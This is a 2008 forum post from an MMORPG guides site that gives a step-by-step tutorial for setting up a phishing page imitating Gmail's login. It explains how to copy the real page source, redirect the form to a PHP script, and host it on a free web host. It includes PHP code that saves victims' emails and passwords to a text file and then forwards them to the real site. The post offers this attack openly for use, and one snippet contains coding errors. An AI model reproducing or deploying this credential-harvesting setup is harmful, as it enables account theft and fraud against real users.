xX-=MistiKmans guide on phishing=-XxHey, sorry if this is not allowed haven't exactly read the rules, I just follow general conduct. If this isn't allowed please delete it.
I am going to explain it and explain the basic way of setting up a phishing site.
Alright phishing is when you create a login page that looks just like it does on the regular websites. Except when they actually do login, the informaiton they'd put into the forms is sent to and saved into a file you have stored. If you have not got this file it'll just create it for you. :D Well... That's if you set it up right. ^_^
Well that's really all phishing is, if you don't understand it why are you on this site? You're ruining it's credability.
Now setting it up is actually quite simple. Although I cannot do it... Only cos I'm trying for RuneScape and I dunno how to do it... Also, I'm trying to make my own I'm not using a premade one. I'll explain for Gmail, because that's really easy.
You go to a free website hosting site. A good one to use is
T35. Create a new file either on the site, or if you can't do that go to the the site you're planning to phish for, in this case, Gmail. Right click somehwere, where it isn't an applet, media thingy etc. So you've right clicked and then hopefully not come back here, because if you were smart you would have read this entire thing first. So yeah, Right click and click view page source. Save the notepad file that comes up. The save thingy will show up, save it as "index.php" obviously without the qutation marks. Make sure you select all files in the drop down menu under the box where you type in a name to save it as. So it would look like this:
|---------------------|
|Index.php |<--- Name entry
|_______________|
|---------------------|
|All files |<--- File type to save it as
|_______________|
And of course click save just over there next to cancel --->
Now You should have done this before you saved it to make it easier, but I was too lazy to type it then.
In the notepad document Press Ctrl+F the find box will show up, type in "action=" I'm sure by now you're smart enough to figure out not to put in the quotation marks, otherwise you wouldn't be up to here. Now it will highlight action="some site name here" <---That site name will be somehting to do with Gmail, because that's what you
SHOULD be testing this on. Replace the site name with "login.php"
Now create a new document. It will also be a .php so open up notepad. Copy and paste this:
CODE
$stuff = "Email: " . $_POST["Email"] . "Password: " . $_POST["Passwd"] . "\r\n\n";
$file = fopen("passwords.txt","a");
fwrite($file,$stuff);
fclose($file);
That is for Gmail, if you want to use it for something else put this in instead.
CODE
$file = fopen("passwords.txt","a");
foreach($_POST as $variable => $value)
{
fwrite($f, $variable . " = " . $value . "\r\n\n";
}
fclose($file);
header("location: http://gmail.com");
Just replace where it says "Location:
http://gmail.com" with whatever site you're using. Now save that file. You don't need to create password.txt it will make the file itself.
Before you go on, if you're going to do this with Gmail you might want to into the index page and edit it. Find "google_transparent.gif" and replace it with this:
CODE
https://www.google.com/accounts/google_transparent.gif
That will bring up the google banner instead of showing nothing. If you're creating a phishing site for something else, it is very handy to do this. Ok, save that. Upload both of them to your website, Now test it. Try to login, you don't even have to use a real account and when it's done loading go into the newly generated passwords.txt file, which will be in the directory on the website hoster. Open it and just scroll through you'll figure it out and you'll find the username and password you'd put in. There you go that is your guide.
May I please get this stickied? If it's allowed of course. ^_^
MmorpGuides.com > Community and Information > Scripting and Programing > Tutorials - Scripting and Programing
Phishing
Oct 17 2008, 04:43 AM
